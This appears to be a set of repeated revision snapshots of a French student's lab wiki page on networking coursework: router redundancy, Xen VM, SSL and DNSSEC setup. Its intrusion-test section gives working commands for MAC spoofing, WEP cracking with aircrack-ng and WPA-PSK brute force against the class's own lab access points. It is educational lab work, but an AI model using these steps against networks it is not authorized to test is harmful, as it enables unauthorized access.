Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen<br /> <br /> nano /etc/ssh/sshd_config allow root login (without password)->yes<br /> apt -get purge network-manager systemd<br /> init tab ==> 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0<br /> </pre><br /> <br /> <pre><br /> Hostname : Werewolf<br /> Distribution : jessie<br /> MAC Address : 00:16:3E:25:96:A7<br /> IP Address(es) : 193.48.57.18<br /> RSA Fingerprint : 4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e<br /> Root Password : Il ne serait plus secret sinon ;)<br /> </pre><br /> <br /> A RETENIR :<br /> <pre><br /> Pour ouvrir la machine : Connexion sur Weppes puis ssh root@193.57.48.183<br /> Pour la fermer : halt<br /> Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg<br /> </pre><br /> <br /> Je commence par installer sur la machine virtuellepostfix et bsd-mailx :<br /> <pre><br /> apt-get install postfix<br /> vim /etc/aliases ==> rajout d'une ligne admin: root<br /> newaliases<br /> apt-get install mailx<br /> </pre><br /> <br /> Maintenant lorsque j'envoie un mail à partir de n'importe quelle adresse mail vers admin@hunt3r.lol, je le reçois et via la commande mailx je peux voir que j'ai reçu un mail. <br /> <br /> En utilisant "p" je peux l'afficher.<br /> <br /> <br /> <br /> <br /> '''''<h2>Services Internet</h2>'''''<br /> ----<br /> <br /> Le nom de domaine que j'ai réservé est : hunt3r.lol<br /> <br /> <h3> Sécurisation de site web par certificat</h3><br /> <br /> Maintenant je vais réclamer mon certificat : <br /> <pre><br /> Je vais sur le site de gandi<br /> Je clique sur Certificat SSL qui est actuellement inactif<br /> Je vais dans la FAQ et je cherche comment générer une CSR ? <br /> Je récupère la commande : openssl req -nodes -newkey rsa:2048 -sha256 -keyout Werewolf.key -out Werewolf.csr que j'utilise dans ma VM<br /> Country Name (2 letter code) [AU]: FR<br /> State or Province Name (full name) [Some-State]: Nord<br /> Locality Name (eg, city) []: Lille<br /> Organization Name (eg, company) [Internet Widgits Pty Ltd]: PolytechLille<br /> Organizational Unit Namec SSLCertificateChainFile. (eg, section) []: <br /> Common Name (eg, YOUR name) []: hunt3r.lol<br /> Email Address []: admin@hunt3r.lol<br /> A challenge password []: <br /> An optional company name []:<br /> Il me génère donc deux fichiers, le .csr et le .key<br /> J'ouvre le fichier Werewolf.csr que je copie colle dans le champ CSR sur gandi.<br /> <br /> Je valide le tout et à présent sur le site de gandi j'ai : Certificat SSL : hunt3r.lol (et non plus inactif)<br /> Je valide ma demande grâce au code reçu dans ma boite mail hunt3r et j'attends le certificat.<br /> Une fois reçu je crée un fichier Werewolf.cer et je colle le certificat que j'ai récupéré.<br /> Même chose pour les certificats intermédiaire.<br /> </pre><br /> <br /> Je peux commencer alors la configuration d'apache2 avec mon certificat :<br /> <br /> <pre><br /> cd /etc/apache2/sites-available<br /> vim default-ssl.conf<br /> SSLCertificateFile /root/Werewolf.cer<br /> SSLCertificateKeyFile /root/Werewolf.key<br /> #SSLCertificateChainFile /root/WerewolfInter.cer<br /> <br /> 3 commandes me permettent de mettre en route le tout :<br /> a2ensite default-ssl<br /> a2enmod ssl<br /> service apache2 restart<br /> </pre><br /> <br /> Une fois cela fait, lorsque je vais sur ma page internet je remarque je peux y aller à la fois normalement c'est à dire en écrivant : http://www.hunt3r.lol/ mais aussi en utilisant la connexion sécurisée : https://www.hunt3r.lol/. On remarque qu'avec l'https on a bien un cadenas.<br /> <br /> <br /> <h3>Sécurisation de serveur DNS par DNSSEC</h3><br /> <br /> <pre><br /> cd /etc/bind<br /> vim named.conf.options ==> rajout de l'option dnssec-enable yes;<br /> mkdir hunt3r.dnssec<br /> cd hunt3r.dnssec<br /> dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE -r /dev/urandom hunt3r.dnssec<br /> dnssec-keygen -a RSASHA1 -b 1024 -n ZONE -r /dev/urandom hunt3r.dnssec<br /> Je renomme les fichiers créé en : <br /> *hunt3r-ksk.key<br /> *hunt3r-ksk.private<br /> *hunt3r-zsk.key<br /> *hunt3r-zsk.private<br /> J'inclus dans le fichier db.hunt3r : <br /> *$include /etc/bind/hunt3r.dnssec/hunt3r-ksk.key<br /> *$include /etc/bind/hunt3r.dnssec/hunt3r-zsk.key<br /> dnssec-signzone -o hunt3r.lol -k hunt3r-ksk ../db.hunter hunt3r-zsk<br /> Modification du fichier named.conf.local ==> db.hunt3r.signed<br /> service bind9 restart<br /> </pre><br /> <br /> <br /> '''''<h2>Réalisation</h2>'''''<br /> ----<br /> <br /> <h3> Installation de LINUX sur les nouveaux PC HP </h3><br /> J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]<br /> <br /> Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : <br /> <br /> <pre><br /> Code :<br /> root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb<br /> </pre><br /> <br /> <pre><br /> On va donc configurer le réseau nous-même.<br /> Adresse IP : 172.20.106.6<br /> Mask : 255.255.255.0<br /> Adresse passerelle : 172.20.106.254<br /> Adresse des serveurs de noms : 193.48.57.34<br /> Nom de machine : perche<br /> Domaine : deule.net<br /> <br /> Mot de passe pour superutilisateur : celui de d'habitude pour un root<br /> Nouvel utilisateur : pifou<br /> Mot de passe nouvel utilisateur : celui de d'habitude pour pifou<br /> <br /> Arrivée au partitionnement :<br /> <br /> J'ai cliqué sur manuel puis sur le n°3 qui avait 22 Gb. J'ai partitionné à 8Gb de façon à avoir 8Gb pour Windows ( on s'en fou de lui) et 14.6Gb pour nous. J'ai ensuite cliqué partitionnement assisté et utiliser le plus grand espace disponible. <br /> Nom du miroir de l'archive Debian : debian.polytech-lille.fr<br /> Mandataire HTTP : http://proxy.polytech-lille.fr:3128<br /> Logiciels à installer : Xfce, service SSH et utilitaies usuels du système (à valider à l'aider de la barre espace)<br /> </pre></div>

Ebourre https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&diff=23162 TP sysres IMA2a5 2015/2016 G6 2015-11-23T16:49:54Z

<p>Ebourre : </p> <hr /> <div><h1> Projet Systèmes&Réseaux IMA2A5 </h1><br /> ----<br /> <br /> Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. <br /><br /> <br /> Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.<br /> <br /><br /> <br /> '''''<h2> Architecture réseau </h2>'''''<br /> ----<br /> <br /> Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.<br /> <br /> La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.<br /> <center><br /> <table><br /> <tr><th>'''N° du VLAN'''</th><th>'''Nom'''</th><th>'''Adresse IP'''</th><th>'''Adresse Routeur 1'''</th><th>'''Adresse Passerelle'''</th></tr><br /> <tr><th>1</th><th>default</th><th>172.20.99.0/24</th><th>172.20.99.252</th><th>172.20.99.254</th></tr><br /> <tr><th>2</th><th>Puduc</th><th>172.20.100.0/24</th><th>172.20.100.252</th><th>172.20.100.254</th></tr><br /> <tr><th>3</th><th>Nounours</th><th>172.20.101.0/24</th><th>172.20.101.252</th><th>172.20.101.254</th></tr><br /> <tr><th>4</th><th>Jeuno</th><th>172.20.102.0/24</th><th>172.20.102.252</th><th>172.20.102.254</th></tr><br /> <tr><th>5</th><th>Relax</th><th>172.20.103.0/24</th><th>172.20.103.252</th><th>172.20.103.254</th></tr><br /> <tr><th>6</th><th>John</th><th>172.20.104.0/24</th><th>172.20.104.252</th><th>172.20.104.254</th></tr><br /> <tr><th>7</th><th>Loki</th><th>172.20.105.0/24</th><th>172.20.105.252</th><th>172.20.105.254</th></tr><br /> <tr><th>8</th><th>Papy</th><th>172.20.106.0/24</th><th>172.20.106.252</th><th>172.20.106.254</th></tr><br /> <tr><th>10</th><th>Hub</th><th>193.48.57.176/28</th><th>193.48.57.188</th><th>193.48.57.190</th></tr><br /> <tr><th>131</th><th>Interco</th><th>192.168.222.8/29</th><th>192.168.222.9</th><th>X</th></tr><br /> </table><br /> </center><br /> <br /> Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera "prise" par le routeur le plus prioritaire. <br /> <br /> <pre><br /> Code sous minicom pour réaliser l'adressage des VLan's: <br /> <br /> - en // passage en mode administrateur<br /> - conf t <br /> - int vlan2 //modification du vlan2<br /> - ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2<br /> - standby 1 ip 172.20.100.254 // adresse de passerelle<br /> - standby 1 preempt //Utilisation du protocole HSRP nécessaire à la redondance<br /> - standby 1 priority 110 // priorité pour la prise de l'adresse passerelle<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un nom à un VLAN: <br /> <br /> - conf t <br /> - vlan8<br /> - name Papy<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un port (içi pour internet)<br /> <br /> - conf t <br /> - interface GigabitEthernet 0/47 // on agit sur ce port<br /> - Sitchport mode access<br /> - switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet<br /> - no shut<br /> </pre><br /> <br /> <pre><br /> Code pour l'échange automatique des tables de routages :<br /> <br /> - Switch(config)#router ospf 1<br /> -Switch(config-router)#log-adjacency-changes<br /> -Switch(config-router)#router-id 172.20.100.252<br /> -Switch(config-router)#log-adjacency-changes <br /> -Switch(config-router)#summary-address 172.20.96.0 255.255.240.0<br /> -Switch(config-router)#summary-address 193.48.57.176 255.255.255.240<br /> -Switch(config-router)#redistribute connected metric 20 subnets <br /> -Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2<br /> </pre><br /> <br /> Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.<br /> <br /> <br /> '''''<h2> Tests d'intrusion </h2>'''''<br /> ----<br /> <br /> <h3>Intrusion par changement d'adresse MAC</h3><br /> <br /> Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.<br /> En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. <br /> <br /> RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. <br /> <br /> SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1<br /> <br /> <pre><br /> Avec une simple ligne de code : je change mon adresse MAC !<br /> - ifconfig wlan0 down<br /> - ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1 //adresse mac de Gauthier<br /> - ifconfig wlan0 up<br /> </pre><br /> <br /> MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.<br /> <br /> <br /> <h3>Cassage de clef WEP d'un point d'accès Wifi</h3><br /> <br /> A partir de là Linux est installé sur la machine. Je vais donc passer maintenant au crackage de la clé WEP.<br /> <br /> Pour cela j'installe aircrack.<br /> <br /> <pre><br /> Code : <br /> apt-get install aircrack-ng<br /> </pre><br /> <br /> <pre><br /> Modification du fichier /etc/apt/sources.list : <br /> rajout de contrib non-free<br /> <br /> Modification du fichier /etc/network/interfaces : <br /> auto eth0<br /> iface eth0 inet static <br /> address 172.20.106.6<br /> netmask 255.255.255.0<br /> gateway 172.20.106.254<br /> <br /> Modification du fichier /etc/resolv.conf : <br /> nameserver 193.48.57.34<br /> </pre><br /> <br /> <pre><br /> Code : <br /> apt-get install firmware-linux-nonfree<br /> apt-get remove network-manager<br /> apt-get install broadcom-sta-dkms<br /> modprobe wl<br /> modprobe -r b44 b43 b43legacy ssb brcmsmac<br /> modprobe -r wl<br /> modprobe wl*dmseg<br /> dmseg<br /> ifconfig -a <br /> reboot<br /> </pre><br /> <br /> A partir de là je tape la commande airmon-ng et j'obtiens enfin wlan0, Broadcom et wl - [phy0]<br /> <br /> <br /> <pre><br /> code :<br /> airmon -ng start wlan1 ==> cela ne fonctionne pas grâce a dmseg on voit que c'est à cause de fail to load rt2870.bin<br /> soltion : apt-get install firmware-ralink<br /> <br /> <br /> Je stop les deux mon0 et mon1 que j'avais créé : via la commande airmon-ng stop mon1 et mon0<br /> <br /> Je ré-ouvre une mon0.<br /> <br /> J'utilise la commande airodump-ng mon0 afin voir tous les SSID qui passent en WIFI.<br /> <br /> Ma cible étant les cracottes je filtre pour n'avoir qu'elles en selectionnant le channel 5 car elles y sont tous dessus.<br /> <br /> Code : airodump-ng mon0 --channel 5. Je ne voit que les cracottes. Je prends la cracotte qui me concerne, c'est à dire la 8. (même numéro de vlan que moi)<br /> <br /> code : airodump-ng mon0 --channel 5 --BSSID 04:da:d2:9c:50:57 ainsi je ne vois que la cracotte que je veux.<br /> <br /> Maintenant pour copier les données dans un fichier il me suffit de rajouter l'option --w nomDeFichier<br /> <br /> <br /> Grâce à la commande aircrack-ng -s *.cap : la clé WEP de la cracotte08 a été cracké : celle-ci est : aa:aa:aa:aa:aa:aa:aa:aa:aa:bb:bb:bb:bb ! <br /> <br /> <br /> </pre><br /> <br /> <br /> <h3>Cassage de mot de passe WPA-PSK par force brute</h3><br /> <br /> On va commencer par créer un dictionnaire de clé : <br /> <br /> <pre><br /> #include <stdio.h><br /> <br /> int main (void)<br /> {<br /> int i=0;<br /> while(i<100000000)<br /> {<br /> printf("%08d\n",i);<br /> i++;<br /> }<br /> return 0;<br /> }<br /> </pre><br /> <br /> Il faut ensuite récupérer le handshake :<br /> <br /> <pre><br /> airodump-ng mon0 --channel 7 --bssid 04:da:d2:9c:50:57 -w handshake<br /> </pre> <br /> <br /> J'envoie le fichier handshake-01.cap sur la zabeth car le PC est beaucoup plus rapide pour réaliser le traitement et trouver la clé.<br /> <br /> <pre><br /> df<br /> fdisk -l<br /> mkfs /dev/sda1<br /> mount /dev/sda1 /mnt<br /> cp handshake-01.cap /mnt<br /> umount /mnt<br /> </pre><br /> <br /> Une fois que le fichier est sur pifou, je lance le traitement :<br /> <br /> <pre><br /> aircrack-ng -w dico.txt handshake-01.cap<br /> </pre><br /> <br /> Après 58 minutes et 48 secondes la clé est trouvée : 12399908 !<br /> <br /> <br /> '''''<h2>Installation des systèmes d'exploitation</h2>'''''<br /> ----<br /> <br /> J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net<br /> <br /> <pre><br /> Code :<br /> xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen<br /> <br /> nano /etc/ssh/sshd_config allow root login (without password)->yes<br /> apt -get purge network-manager systemd<br /> init tab ==> 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0<br /> </pre><br /> <br /> <pre><br /> Hostname : Werewolf<br /> Distribution : jessie<br /> MAC Address : 00:16:3E:25:96:A7<br /> IP Address(es) : 193.48.57.18<br /> RSA Fingerprint : 4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e<br /> Root Password : Il ne serait plus secret sinon ;)<br /> </pre><br /> <br /> A RETENIR :<br /> <pre><br /> Pour ouvrir la machine : Connexion sur Weppes puis ssh root@193.57.48.183<br /> Pour la fermer : halt<br /> Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg<br /> </pre><br /> <br /> Je commence par installer sur la machine virtuellepostfix et bsd-mailx :<br /> <pre><br /> apt-get install postfix<br /> vim /etc/aliases ==> rajout d'une ligne admin: root<br /> newaliases<br /> apt-get install mailx<br /> </pre><br /> <br /> Maintenant lorsque j'envoie un mail à partir de n'importe quelle adresse mail vers admin@hunt3r.lol, je le reçois et via la commande mailx je peux voir que j'ai reçu un mail. <br /> <br /> En utilisant "p" je peux l'afficher.<br /> <br /> <br /> <br /> <br /> '''''<h2>Services Internet</h2>'''''<br /> ----<br /> <br /> Le nom de domaine que j'ai réservé est : hunt3r.lol<br /> <br /> <h3> Sécurisation de site web par certificat</h3><br /> <br /> Maintenant je vais réclamer mon certificat : <br /> <pre><br /> Je vais sur le site de gandi<br /> Je clique sur Certificat SSL qui est actuellement inactif<br /> Je vais dans la FAQ et je cherche comment générer une CSR ? <br /> Je récupère la commande : openssl req -nodes -newkey rsa:2048 -sha256 -keyout Werewolf.key -out Werewolf.csr que j'utilise dans ma VM<br /> Country Name (2 letter code) [AU]: FR<br /> State or Province Name (full name) [Some-State]: Nord<br /> Locality Name (eg, city) []: Lille<br /> Organization Name (eg, company) [Internet Widgits Pty Ltd]: PolytechLille<br /> Organizational Unit Namec SSLCertificateChainFile. (eg, section) []: <br /> Common Name (eg, YOUR name) []: hunt3r.lol<br /> Email Address []: admin@hunt3r.lol<br /> A challenge password []: <br /> An optional company name []:<br /> Il me génère donc deux fichiers, le .csr et le .key<br /> J'ouvre le fichier Werewolf.csr que je copie colle dans le champ CSR sur gandi.<br /> <br /> Je valide le tout et à présent sur le site de gandi j'ai : Certificat SSL : hunt3r.lol (et non plus inactif)<br /> Je valide ma demande grâce au code reçu dans ma boite mail hunt3r et j'attends le certificat.<br /> Une fois reçu je crée un fichier Werewolf.cer et je colle le certificat que j'ai récupéré.<br /> Même chose pour les certificats intermédiaire.<br /> </pre><br /> <br /> Je peux commencer alors la configuration d'apache2 avec mon certificat :<br /> <br /> <pre><br /> cd /etc/apache2/sites-available<br /> vim default-ssl.conf<br /> SSLCertificateFile /root/Werewolf.cer<br /> SSLCertificateKeyFile /root/Werewolf.key<br /> #SSLCertificateChainFile /root/WerewolfInter.cer<br /> <br /> 3 commandes me permettent de mettre en route le tout :<br /> a2ensite default-ssl<br /> a2enmod ssl<br /> service apache2 restart<br /> </pre><br /> <br /> Une fois cela fait, lorsque je vais sur ma page internet je remarque je peux y aller à la fois normalement c'est à dire en écrivant : http://www.hunt3r.lol/ mais aussi en utilisant la connexion sécurisée : https://www.hunt3r.lol/. On remarque qu'avec l'https on a bien un cadenas.<br /> <br /> <br /> <h3>Sécurisation de serveur DNS par DNSSEC</h3><br /> <br /> <pre><br /> cd /etc/bind<br /> vim named.conf.options ==> rajout de l'option dnssec-enable yes;<br /> mkdir hunt3r.dnssec<br /> cd hunt3r.dnssec<br /> dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE -r /dev/urandom hunt3r.dnssec<br /> dnssec-keygen -a RSASHA1 -b 1024 -n ZONE -r /dev/urandom hunt3r.dnssec<br /> Je renomme les fichiers créé en : <br /> *hunt3r-ksk.key<br /> *hunt3r-ksk.private<br /> *hunt3r-zsk.key<br /> *hunt3r-zsk.private<br /> J'inclus dans le fichier db.hunt3r : <br /> *$include /etc/bind/hunt3r.dnssec/hunt3r-ksk.key<br /> *$include /etc/bind/hunt3r.dnssec/hunt3r-zsk.key<br /> dnssec-signzone -o hunt3r.lol -k hunt3r-ksk ../db.hunter hunt3r-zsk<br /> <br /> <br /> <br /> </pre><br /> <br /> <br /> '''''<h2>Réalisation</h2>'''''<br /> ----<br /> <br /> <h3> Installation de LINUX sur les nouveaux PC HP </h3><br /> J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]<br /> <br /> Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : <br /> <br /> <pre><br /> Code :<br /> root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb<br /> </pre><br /> <br /> <pre><br /> On va donc configurer le réseau nous-même.<br /> Adresse IP : 172.20.106.6<br /> Mask : 255.255.255.0<br /> Adresse passerelle : 172.20.106.254<br /> Adresse des serveurs de noms : 193.48.57.34<br /> Nom de machine : perche<br /> Domaine : deule.net<br /> <br /> Mot de passe pour superutilisateur : celui de d'habitude pour un root<br /> Nouvel utilisateur : pifou<br /> Mot de passe nouvel utilisateur : celui de d'habitude pour pifou<br /> <br /> Arrivée au partitionnement :<br /> <br /> J'ai cliqué sur manuel puis sur le n°3 qui avait 22 Gb. J'ai partitionné à 8Gb de façon à avoir 8Gb pour Windows ( on s'en fou de lui) et 14.6Gb pour nous. J'ai ensuite cliqué partitionnement assisté et utiliser le plus grand espace disponible. <br /> Nom du miroir de l'archive Debian : debian.polytech-lille.fr<br /> Mandataire HTTP : http://proxy.polytech-lille.fr:3128<br /> Logiciels à installer : Xfce, service SSH et utilitaies usuels du système (à valider à l'aider de la barre espace)<br /> </pre></div>

Ebourre https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&diff=23155 TP sysres IMA2a5 2015/2016 G6 2015-11-23T16:08:48Z

<p>Ebourre : </p> <hr /> <div><h1> Projet Systèmes&Réseaux IMA2A5 </h1><br /> ----<br /> <br /> Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. <br /><br /> <br /> Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.<br /> <br /><br /> <br /> '''''<h2> Architecture réseau </h2>'''''<br /> ----<br /> <br /> Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.<br /> <br /> La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.<br /> <center><br /> <table><br /> <tr><th>'''N° du VLAN'''</th><th>'''Nom'''</th><th>'''Adresse IP'''</th><th>'''Adresse Routeur 1'''</th><th>'''Adresse Passerelle'''</th></tr><br /> <tr><th>1</th><th>default</th><th>172.20.99.0/24</th><th>172.20.99.252</th><th>172.20.99.254</th></tr><br /> <tr><th>2</th><th>Puduc</th><th>172.20.100.0/24</th><th>172.20.100.252</th><th>172.20.100.254</th></tr><br /> <tr><th>3</th><th>Nounours</th><th>172.20.101.0/24</th><th>172.20.101.252</th><th>172.20.101.254</th></tr><br /> <tr><th>4</th><th>Jeuno</th><th>172.20.102.0/24</th><th>172.20.102.252</th><th>172.20.102.254</th></tr><br /> <tr><th>5</th><th>Relax</th><th>172.20.103.0/24</th><th>172.20.103.252</th><th>172.20.103.254</th></tr><br /> <tr><th>6</th><th>John</th><th>172.20.104.0/24</th><th>172.20.104.252</th><th>172.20.104.254</th></tr><br /> <tr><th>7</th><th>Loki</th><th>172.20.105.0/24</th><th>172.20.105.252</th><th>172.20.105.254</th></tr><br /> <tr><th>8</th><th>Papy</th><th>172.20.106.0/24</th><th>172.20.106.252</th><th>172.20.106.254</th></tr><br /> <tr><th>10</th><th>Hub</th><th>193.48.57.176/28</th><th>193.48.57.188</th><th>193.48.57.190</th></tr><br /> <tr><th>131</th><th>Interco</th><th>192.168.222.8/29</th><th>192.168.222.9</th><th>X</th></tr><br /> </table><br /> </center><br /> <br /> Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera "prise" par le routeur le plus prioritaire. <br /> <br /> <pre><br /> Code sous minicom pour réaliser l'adressage des VLan's: <br /> <br /> - en // passage en mode administrateur<br /> - conf t <br /> - int vlan2 //modification du vlan2<br /> - ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2<br /> - standby 1 ip 172.20.100.254 // adresse de passerelle<br /> - standby 1 preempt //Utilisation du protocole HSRP nécessaire à la redondance<br /> - standby 1 priority 110 // priorité pour la prise de l'adresse passerelle<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un nom à un VLAN: <br /> <br /> - conf t <br /> - vlan8<br /> - name Papy<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un port (içi pour internet)<br /> <br /> - conf t <br /> - interface GigabitEthernet 0/47 // on agit sur ce port<br /> - Sitchport mode access<br /> - switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet<br /> - no shut<br /> </pre><br /> <br /> <pre><br /> Code pour l'échange automatique des tables de routages :<br /> <br /> - Switch(config)#router ospf 1<br /> -Switch(config-router)#log-adjacency-changes<br /> -Switch(config-router)#router-id 172.20.100.252<br /> -Switch(config-router)#log-adjacency-changes <br /> -Switch(config-router)#summary-address 172.20.96.0 255.255.240.0<br /> -Switch(config-router)#summary-address 193.48.57.176 255.255.255.240<br /> -Switch(config-router)#redistribute connected metric 20 subnets <br /> -Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2<br /> </pre><br /> <br /> Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.<br /> <br /> <br /> '''''<h2> Tests d'intrusion </h2>'''''<br /> ----<br /> <br /> <h3>Intrusion par changement d'adresse MAC</h3><br /> <br /> Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.<br /> En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. <br /> <br /> RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. <br /> <br /> SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1<br /> <br /> <pre><br /> Avec une simple ligne de code : je change mon adresse MAC !<br /> - ifconfig wlan0 down<br /> - ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1 //adresse mac de Gauthier<br /> - ifconfig wlan0 up<br /> </pre><br /> <br /> MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.<br /> <br /> <br /> <h3>Cassage de clef WEP d'un point d'accès Wifi</h3><br /> <br /> A partir de là Linux est installé sur la machine. Je vais donc passer maintenant au crackage de la clé WEP.<br /> <br /> Pour cela j'installe aircrack.<br /> <br /> <pre><br /> Code : <br /> apt-get install aircrack-ng<br /> </pre><br /> <br /> <pre><br /> Modification du fichier /etc/apt/sources.list : <br /> rajout de contrib non-free<br /> <br /> Modification du fichier /etc/network/interfaces : <br /> auto eth0<br /> iface eth0 inet static <br /> address 172.20.106.6<br /> netmask 255.255.255.0<br /> gateway 172.20.106.254<br /> <br /> Modification du fichier /etc/resolv.conf : <br /> nameserver 193.48.57.34<br /> </pre><br /> <br /> <pre><br /> Code : <br /> apt-get install firmware-linux-nonfree<br /> apt-get remove network-manager<br /> apt-get install broadcom-sta-dkms<br /> modprobe wl<br /> modprobe -r b44 b43 b43legacy ssb brcmsmac<br /> modprobe -r wl<br /> modprobe wl*dmseg<br /> dmseg<br /> ifconfig -a <br /> reboot<br /> </pre><br /> <br /> A partir de là je tape la commande airmon-ng et j'obtiens enfin wlan0, Broadcom et wl - [phy0]<br /> <br /> <br /> <pre><br /> code :<br /> airmon -ng start wlan1 ==> cela ne fonctionne pas grâce a dmseg on voit que c'est à cause de fail to load rt2870.bin<br /> soltion : apt-get install firmware-ralink<br /> <br /> <br /> Je stop les deux mon0 et mon1 que j'avais créé : via la commande airmon-ng stop mon1 et mon0<br /> <br /> Je ré-ouvre une mon0.<br /> <br /> J'utilise la commande airodump-ng mon0 afin voir tous les SSID qui passent en WIFI.<br /> <br /> Ma cible étant les cracottes je filtre pour n'avoir qu'elles en selectionnant le channel 5 car elles y sont tous dessus.<br /> <br /> Code : airodump-ng mon0 --channel 5. Je ne voit que les cracottes. Je prends la cracotte qui me concerne, c'est à dire la 8. (même numéro de vlan que moi)<br /> <br /> code : airodump-ng mon0 --channel 5 --BSSID 04:da:d2:9c:50:57 ainsi je ne vois que la cracotte que je veux.<br /> <br /> Maintenant pour copier les données dans un fichier il me suffit de rajouter l'option --w nomDeFichier<br /> <br /> <br /> Grâce à la commande aircrack-ng -s *.cap : la clé WEP de la cracotte08 a été cracké : celle-ci est : aa:aa:aa:aa:aa:aa:aa:aa:aa:bb:bb:bb:bb ! <br /> <br /> <br /> </pre><br /> <br /> <br /> <h3>Cassage de mot de passe WPA-PSK par force brute</h3><br /> <br /> On va commencer par créer un dictionnaire de clé : <br /> <br /> <pre><br /> #include <stdio.h><br /> <br /> int main (void)<br /> {<br /> int i=0;<br 